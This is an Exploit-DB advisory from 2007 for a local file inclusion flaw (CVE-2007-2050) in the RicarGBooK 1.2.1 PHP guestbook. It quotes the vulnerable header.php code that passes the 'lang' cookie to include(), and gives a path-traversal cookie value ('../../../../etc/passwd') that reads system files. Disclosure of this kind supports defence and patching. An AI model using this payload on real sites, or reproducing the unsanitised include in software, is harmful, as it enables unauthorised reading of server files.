RicarGBooK 1.2.1 header.php lang Local File Inclusion Vulnerability

2007-04-12T00:00:00
ID EDB-ID:3718
Type exploitdb
Reporter Dj7xpl
Modified 2007-04-12T00:00:00

Description

RicarGBooK 1.2.1 (header.php lang) Local File Inclusion Vulnerability. CVE-2007-2050. Webapps exploit for php platform

                                        
                                            -=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

                       RicarGBooK 1.2.1 

-=-=-=-=-=-=-=-=-=-=-=-=D=J=7=X=P=L=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

* Author :

            Dj7xpl / Dj7xpl[at]Yahoo[dot]com

* Type :

            Local File Inclusion Vulnerabilitiy By Cookie

* Download :

            http://ricargbook.adrielmedia.com

-=-=-=-=-=-=-=-=-=-=-=-=D=J=7=X=P=L=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

* Vuln Code :       -=-= Header.php =-=-


if (isset($HTTP_COOKIE_VARS["lang"])) {
	$guest_lang = $HTTP_COOKIE_VARS["lang"];
	include ('languages/'.$guest_lang);
} else {
	$guest_lang = $language;
	include ('languages/'.$language);

-=-=-=-=-=-=-=-=-=-=-=-=D=J=7=X=P=L=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

* Vuln And Example Picture :

            Edit Cookie :

            Server :  http://[Target]			
	    Name   :  lang
	    Value  :  Local File      E.g   :  ../../../../etc/passwd
			
			
	    [X] http://dj7xpl.by.ru/r1.jpg
	    [X] http://dj7xpl.by.ru/r2.jpg
			
-=-=-=-=-=-=-=-=-=-=-=-=D=J=7=X=P=L=-=-=-=-=-=-=-=-=-=-=-=-=-

# Sp Tnx : str0ke

# milw0rm.com [2007-04-12]